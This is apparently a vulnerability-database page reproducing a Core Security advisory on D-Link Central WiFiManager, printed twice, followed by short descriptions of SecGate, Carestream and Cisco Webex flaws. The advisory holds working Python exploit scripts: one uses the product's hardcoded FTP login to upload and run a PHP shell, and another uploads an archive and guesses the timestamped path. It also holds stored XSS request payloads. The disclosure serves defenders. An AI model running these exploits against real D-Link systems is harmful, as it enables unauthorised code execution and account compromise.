VARIoT IoT vulnerabilities database

An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. The 'sitename' parameter of the UpdateSite endpoint is vulnerable to stored XSS. D-Link Central WiFi Manager Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. A remote attacker could use this vulnerability to inject arbitrary Web scripts or HTML. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ D-Link Central WiFiManager Software Controller Multiple Vulnerabilities 1. *Advisory Information* Title: D-Link Central WiFiManager Software Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0010 Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities Date published: 2018-10-04 Date of last update: 2018-10-04 Vendors contacted: D-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 3. *Vulnerability Description* D-Link's website states that: [1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network. Vulnerabilities were found in the Central WiFiManager Software Controller, allowing unauthenticated and authenticated file upload with dangerous type that could lead to remote code execution with system permissions. Also, two stored Cross Site Scripting vulnerabilities were found. 4. *Vulnerable Packages* . Central WifiManager v1.03 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* D-Link released the following Beta version that addresses the reported vulnerabilities: . Central WifiManager v 1.03r0100-Beta1 In addition, D-Link published a security note in: https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 6. *Credits* These vulnerabilities were discovered and researched by Julian Munoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* D-Link Central WiFiManager Software Controller exposes an FTP server that serves by default in port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this fact, we will upload a PHP file in the '/web/public' directory and then, by requesting this file, will be able to execute arbitrary code on the target system (shown in 7.1). On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path "\web\captivalportal" in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one. 7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* [CVE-2018-17440] The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution. /----- import requests from ftplib import FTP #stablish connection with FTP server host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000) ftp.login(<ftp://ftp.login(>"admin", "admin") data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() #upload PHP poc file php_file = open("poc.php", "rb") ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')> ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file) ftp.dir(data.append)<ftp://ftp.dir(data.append)> ftp.quit()<ftp://ftp.quit()> for line in data: print "-", line session = requests.Session() session.trust_env = False #get the uploaded file for remote code execution get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False) print get_uploaded_file.text -----/ 7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* [CVE-2018-17442] In this case we make a file upload using the functionality given by the onUploadLogPic endpoint, that will take a .rar file, decompress it and store it in a folder named after the PHP time() function. Our goal is first obtain the server's time, upload a .rar with our PHP file, calculate the proper epoch and iterate increasing it until we hit the proper one and remote code execution is achieved. /----- import re import time import requests import datetime import tarfile def parse_to_datetime(date_string): date_list = date_string.split("-") td = date_list[2][2:].split(":") return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2])) session = requests.Session() session.trust_env = False php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie = {'PHPSESSID': php_session_id} #create tar file to upload. poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close() #get server datetime. get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '') #generate epoch from server's date epoch = int(time.mktime(parse_to_datetime(date).timetuple())) #upload attack PHP file. attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', files=tar_file, cookies=cookie, verify=False) for i in range(0,20): #get the uploaded file named after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) if get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_file.text break epoch += 1 -----/ 7.3. *Cross-Site Scripting in the application site name parameter* [CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting: The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/Config/CreatSite Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 66 siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1 -----/ 7.4. The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96 Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& -----/ 8. *Report Timeline* 2018-06-04: Core Security sent an initial notification to D-Link, including a draft advisory. 2018-06-06:D-Link confirmed the reception of the advisory and informed they will have an initial response on 06/08. 2018-06-08: D-Link informed that they would provide a schedule for the fixes on 06/13. 2018-06-08: Core Security thanked the update. 2018-06-14: D-Link informed its plan of remediation and notified Core Security that the fixed version will be available on 08/31. 2018-06-15: Core Security thanked the update and proposed to keep in regular contact until this tentative release date. 2018-07-23: Core Security requested a status update. 2018-07-25: D-Link answered saying that they are still targeting 08/31 as the release date. 2018-08-24: Core Security requested a new status update and a solidified release date for the fixed version. 2018-08-28: D-Link sent a beta version for test. 2018-08-30: Core Security tested the beta version and requested D-Link to coordinate a release date. 2018-09-21: D-Link informed that they were planning a security announcement and they were ready to schedule a disclosure date. 2018-09-24: Core Security thanked the update and proposed October 4th as the publication date. 2018-10-04: Advisory CORE-2018-0010 published. 9. *References* [1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com> 12. *Disclaimer* The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

An issue was discovered on D-Link Central WiFi Manager before v 1.03r0100-Beta1. The 'username' parameter of the addUser endpoint is vulnerable to stored XSS. D-Link Central WiFi Manager Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. A remote attacker could use this vulnerability to inject arbitrary Web scripts or HTML. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ D-Link Central WiFiManager Software Controller Multiple Vulnerabilities 1. *Advisory Information* Title: D-Link Central WiFiManager Software Controller Multiple Vulnerabilities Advisory ID: CORE-2018-0010 Advisory URL: http://www.coresecurity.com/advisories/d-link-central-wifimanager-software-controller-multiple-vulnerabilities Date published: 2018-10-04 Date of last update: 2018-10-04 Vendors contacted: D-Link Release mode: Coordinated release 2. *Vulnerability Information* Class: Unrestricted Upload of File with Dangerous Type [CWE-434], Improper Authorization [CWE-285], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79], Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-17440, CVE-2018-17442, CVE-2018-17443, CVE-2018-17441 3. *Vulnerability Description* D-Link's website states that: [1] Central WiFiManager Software Controller helps network administrators streamline their wireless access point (AP) management workflow. Central WiFiManager is an innovative approach to the more traditional hardware-based multiple access point management system. It uses a centralized server to both remotely manage and monitor wireless APs on a network. Vulnerabilities were found in the Central WiFiManager Software Controller, allowing unauthenticated and authenticated file upload with dangerous type that could lead to remote code execution with system permissions. Also, two stored Cross Site Scripting vulnerabilities were found. 4. *Vulnerable Packages* . Central WifiManager v1.03 Other products and versions might be affected, but they were not tested. 5. *Vendor Information, Solutions and Workarounds* D-Link released the following Beta version that addresses the reported vulnerabilities: . Central WifiManager v 1.03r0100-Beta1 In addition, D-Link published a security note in: https://securityadvisories.dlink.com/announcement/publication.aspx?name=SAP10092 6. *Credits* These vulnerabilities were discovered and researched by Julian Munoz from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* D-Link Central WiFiManager Software Controller exposes an FTP server that serves by default in port 9000 and has hardcoded credentials (admin, admin). Taking advantage of this fact, we will upload a PHP file in the '/web/public' directory and then, by requesting this file, will be able to execute arbitrary code on the target system (shown in 7.1). On 7.2 we show a similar attack to but in this case with an authenticated user in the web application. The application has a functionality to upload a .rar file used for the captive portal displayed by the Access Points. We will craft a .rar with a PHP file that we will end up executing in the context of the web application. When the .rar is uploaded is stored in the path "\web\captivalportal" in a folder with a timestamp created by the PHP time() function. In order to know what is the web server's time we request an information file that contains the time we are looking for. After we have the server's time we upload the .rar, calculate the proper epoch and request the appropriate path increasing this epoch by one until we hit the correct one. 7.1. *Unauthenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* [CVE-2018-17440] The web application starts an FTP server running on the port 9000 by default with admin/admin credentials and do not show the option to change it, so in this POC we establish a connection with the server and upload a PHP file. Since the application do not restrict unauthenticated users to request any file in the web root, we later request the uploaded file to achieve remote code execution. /----- import requests from ftplib import FTP #stablish connection with FTP server host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ip<ftp://ftp.connect(host=host_ip>, port=9000) ftp.login(<ftp://ftp.login(>"admin", "admin") data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() #upload PHP poc file php_file = open("poc.php", "rb") ftp.cwd('/web/public')<ftp://ftp.cwd('/web/public')> ftp.storbinary(<ftp://ftp.storbinary(>"STOR write_file.php", php_file) ftp.dir(data.append)<ftp://ftp.dir(data.append)> ftp.quit()<ftp://ftp.quit()> for line in data: print "-", line session = requests.Session() session.trust_env = False #get the uploaded file for remote code execution get_uploaded_file = session.get('https://127.0.0.1/public/write_file.php', verify=False) print get_uploaded_file.text -----/ 7.2. *Authenticated Remote Code Execution by Unrestricted Upload of File with Dangerous Type* [CVE-2018-17442] In this case we make a file upload using the functionality given by the onUploadLogPic endpoint, that will take a .rar file, decompress it and store it in a folder named after the PHP time() function. Our goal is first obtain the server's time, upload a .rar with our PHP file, calculate the proper epoch and iterate increasing it until we hit the proper one and remote code execution is achieved. /----- import re import time import requests import datetime import tarfile def parse_to_datetime(date_string): date_list = date_string.split("-") td = date_list[2][2:].split(":") return datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2][:2]),int(td[0]), int(td[1]), int(td[2])) session = requests.Session() session.trust_env = False php_session_id = "96sml0e9soke02k6d672oumqq4" #example (insert here the proper session id) cookie = {'PHPSESSID': php_session_id} #create tar file to upload. poc_php_file = open("poc.php", "w+") poc_php_file.write("<?php\nsystem('whoami');\n?>") poc_php_file.close() poc_tar_file = tarfile.open("poc_tar_file.tar", mode="w") poc_tar_file.add("poc.php") poc_tar_file.close() #get server datetime. get_server_time_from_requested_file = session.get('https://127.0.0.1/index.php/ReportSecurity/ExportAP/type/TXT', cookies=cookie, verify=False) date = re.search("Date(.*)\d", get_server_time_from_requested_file.text).group().replace('DateTime ', '') #generate epoch from server's date epoch = int(time.mktime(parse_to_datetime(date).timetuple())) #upload attack PHP file. attack_tar_file = "poc_tar_file.tar" tar_file = {'stylename': 'attack', 'logfile': open(attack_tar_file, 'rb')} restore_backup_response = session.post('https://127.0.0.1/index.php/Config/onUploadLogPic', files=tar_file, cookies=cookie, verify=False) for i in range(0,20): #get the uploaded file named after time epoch, returned by PHP time() function. filename = str(epoch) + "/" + "poc.php" get_uploaded_file = session.get('https://127.0.0.1/captivalportal/%s' %filename, verify=False) if get_uploaded_file.status_code == 200: print "Remote Code Execution Achived" print get_uploaded_file.text break epoch += 1 -----/ 7.3. *Cross-Site Scripting in the application site name parameter* [CVE-2018-17443] The 'sitename' parameter of the UpdateSite endpoint is vulnerable to a stored Cross Site Scripting: The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/Config/UpdateSite HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/Config/CreatSite Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 66 siteid=0&sitename=<script>alert(1)</script>&sitenamehid=fakesitename&UserMember%5B%5D=1 -----/ 7.4. The following is a proof of concept to demonstrate the vulnerability: /----- POST /index.php/System/addUser HTTP/1.1 Host: 10.2.45.220 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.2.45.220/index.php/System/userManager Content-Type: application/x-www-form-urlencoded; Content-Length: 96 Cookie: Test_showmessage=false; Test_tableStyle=1; think_language=en-US; PHPSESSID=4fvbnmn343424rg8m1jg3qbc05 Connection: close username=<script>alert(1)</script>&userpassword=fakepassword&level=1&email=&remark=&userid=0&creator=1&mandatory=change& -----/ 8. *Report Timeline* 2018-06-04: Core Security sent an initial notification to D-Link, including a draft advisory. 2018-06-06:D-Link confirmed the reception of the advisory and informed they will have an initial response on 06/08. 2018-06-08: D-Link informed that they would provide a schedule for the fixes on 06/13. 2018-06-08: Core Security thanked the update. 2018-06-14: D-Link informed its plan of remediation and notified Core Security that the fixed version will be available on 08/31. 2018-06-15: Core Security thanked the update and proposed to keep in regular contact until this tentative release date. 2018-07-23: Core Security requested a status update. 2018-07-25: D-Link answered saying that they are still targeting 08/31 as the release date. 2018-08-24: Core Security requested a new status update and a solidified release date for the fixed version. 2018-08-28: D-Link sent a beta version for test. 2018-08-30: Core Security tested the beta version and requested D-Link to coordinate a release date. 2018-09-21: D-Link informed that they were planning a security announcement and they were ready to schedule a disclosure date. 2018-09-24: Core Security thanked the update and proposed October 4th as the publication date. 2018-10-04: Advisory CORE-2018-0010 published. 9. *References* [1] http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/. 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com<mailto:info@coresecurity.com> 12. *Disclaimer* The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

SecGate3600-A1500 is a security gateway product under Netshen Information Technology (Beijing) Co., Ltd. SecGate3600-A1500 has COOKIE fixing and login bypass vulnerability. Attackers can use the vulnerability to obtain sensitive information.

Carestream Vue RIS, RIS Client Builds: Version 11.2 and prior running on a Windows 8.1 machine with IIS/7.5. When contacting a Carestream server where there is no Oracle TNS listener available, users will trigger an HTTP 500 error, leaking technical information an attacker could use to initiate a more elaborate attack. Carestream Vue RIS Contains an information disclosure vulnerability.Information may be obtained. An attacker could exploit this vulnerability to obtain technical information

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Crafted data in a ARF file can trigger an overflow of a heap-based buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Crafted data in an ARF file can trigger an integer underflow before a memory write operation. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

A vulnerability in the Cisco Webex Network Recording Player for Microsoft Windows and the Cisco Webex Player for Microsoft Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerability exist because the affected software improperly validates Advanced Recording Format (ARF) and Webex Recording Format (WRF) files. An attacker could exploit this vulnerability by sending a user a malicious ARF or WRF file via a link or an email attachment and persuading the user to open the file by using the affected software. A successful exploit could allow the attacker to execute arbitrary code on the affected system. Cisco Webex Network Recording Player and Webex Player Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Crafted data in an ARF file can trigger an integer underflow before a memory write operation. These issues are being tracked by Cisco Bug IDs CSCvj83752, CSCvj83767, CSCvj83771, CSCvj83793, CSCvj83797, CSCvj83803, CSCvj83818, CSCvj83824, CSCvj83831, CSCvj87929, CSCvj87934, CSCvj93870, CSCvj93877, CSCvk31089, CSCvk33049, CSCvk52510, CSCvk52518, CSCvk52521, CSCvk59945, CSCvk59949, CSCvk59950, CSCvk60158, CSCvk60163, CSCvm51315, CSCvm51318, CSCvm51361, CSCvm51371, CSCvm51373, CSCvm51374, CSCvm51382, CSCvm51386, CSCvm51391, CSCvm51393, CSCvm51396, CSCvm51398, CSCvm51412, CSCvm51413, CSCvm54531, and CSCvm54538

